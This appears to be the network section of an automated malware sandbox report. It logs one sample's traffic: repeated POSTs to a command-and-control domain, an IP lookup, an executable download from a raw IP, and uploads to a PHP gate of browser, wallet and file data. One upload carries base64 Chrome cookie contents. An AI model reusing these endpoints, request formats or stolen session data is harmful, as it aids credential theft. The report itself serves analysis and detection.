                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_file.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 84Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: POST /get_update.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: yalubluseks.euContent-Length: 19Expect: 100-continue
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficHTTP traffic detected: GET /ldms/66fb252fe232b_Patksl.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 46.8.231.109Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 30 38 43 39 33 43 36 34 34 33 33 34 33 30 33 37 33 35 33 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="hwid"7C08C93C64433430373531------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="build"default------KJKJJEGIDBGIDGCBAFHC--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCBHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 2d 2d 0d 0a Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="message"browsers------GHCGDAFCFHIDBGDHCFCB--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAKHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 2d 2d 0d 0a Data Ascii: ------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="message"plugins------BFBAAFHDHCBGCAKFHDAK--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDBHost: 46.8.231.109Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="message"fplugins------DHCAAEBKEGHJKEBFHJDB--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDAEBGIDBGHIECBGHJDHost: 46.8.231.109Content-Length: 7547Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDAEBGCAAECAKFHIIJDBHost: 46.8.231.109Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 41 45 42 47 43 41 41 45 43 41 4b 46 48 49 49 4a 44 42 2d 2d 0d 0a Data Ascii: ------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------IDAEBGCAAECAKFHIIJDBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHDGHCGHCAAKFIIECFHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 44 47 48 43 47 48 43 41 41 4b 46 49 49 45 43 46 2d 2d 0d 0a Data Ascii: ------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DBGHDGHCGHCAAKFIIECFContent-Disposition: form-data; name="file"------DBGHDGHCGHCAAKFIIECF--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFCHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="file"------IIEBAFCBKFIDGCAKKKFC--
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 46.8.231.109Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIJJDGDHDGDAKFIECFIJHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 4a 44 47 44 48 44 47 44 41 4b 46 49 45 43 46 49 4a 2d 2d 0d 0a Data Ascii: ------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------HIJJDGDHDGDAKFIECFIJContent-Disposition: form-data; name="message"wallets------HIJJDGDHDGDAKFIECFIJ--
                            Source: global trafficHTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGIJEGCGDGHDHIDHDGCBHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 36 32 35 66 34 31 61 31 38 34 39 36 32 35 31 63 30 39 63 64 66 61 34 63 64 62 31 61 66 38 66 37 38 31 65 64 30 30 61 30 33 64 66 66 38 64 36 37 61 35 32 34 35 65 39 33 64 33 63 32 65 66 61 64 31 30 31 35 35 62 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 49 4a 45 47 43 47 44 47 48 44 48 49 44 48 44 47 43 42 2d 2d 0d 0a Data Ascii: ------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="token"d625f41a18496251c09cdfa4cdb1af8f781ed00a03dff8d67a5245e93d3c2efad10155bf------BGIJEGCGDGHDHIDHDGCBContent-Disposition: form-data; name="message"files------BGIJEGCGDGHDHIDHDGCB--
